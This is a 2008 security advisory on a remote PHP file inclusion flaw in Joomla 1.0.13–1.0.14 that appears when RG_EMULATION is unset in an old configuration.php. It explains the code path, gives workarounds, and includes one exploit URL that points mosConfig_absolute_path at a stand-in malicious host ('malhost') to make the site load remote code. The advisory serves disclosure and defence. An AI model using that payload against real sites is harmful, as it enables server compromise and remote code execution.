Affects: Joomla 1.0.13 - 1.0.14 Vulnerability: (remote) PHP file inclusion possible if old configuration.php Date: 14-feb-2008 Introduction: Remote PHP file inclusion is possible when RG_EMULATION is not defined in configuration.php. This is typical when upgrading from an older version, leaving configuration.php untouched. Furthermore, in PHP, register_globals must be 'off', for this exploit to work. In Joomla >=1.0.13, configuration.php-dist disables register_globals emulation, by defining RG_EMULATION false. In older Joomla versions, this was defined in globals.php instead. Users upgrading, without touching configuration.php (quite typical), will have RG_EMULATION unset, resulting in the following vulnerability. In Revision 7424 of globals.php, the 'configuration.php' file is included before registerGlobals() is called, allowing a malicious peer to override any value set in configuration.php. Details: Since revision 7424, globals.php includes 'configuration.php' if RG_EMULATION is unset, and enables RG_EMULATION by default for 'old configuration files': if( defined( 'RG_EMULATION' ) === false ) { if( file_exists( dirname(__FILE__).'/configuration.php' ) ) { require( dirname(__FILE__).'/configuration.php' ); } if( defined( 'RG_EMULATION' ) === false ) { // The configuration file is old so default to on define( 'RG_EMULATION', 1 ); } } The registerGlobals function is called *after* having included 'configuration.php': } else if (ini_get('register_globals') == 0) { // php.ini has register_globals = off and emulate = on registerGlobals(); Maliciously set GET variables cause variables set by configuration.php to be overwritten. Looking in index.php: require( 'globals.php' ); require_once( 'configuration.php' ); Since 'configuration.php' was already included by globals.php, the require_once() won't include the configuration.php again (leaving "attacker's" values untouched!). The exploit: http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s cript.txt Workaround: In index*.php and administrator/index*.php change: require_once( 'configuration.php' ); to require('configuration.php'); Or disable RG_EMULATION by using the line in configuration.php-dist in configuration.php: if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security Regards, Hendrik-Jan Verheij BWSS B.V.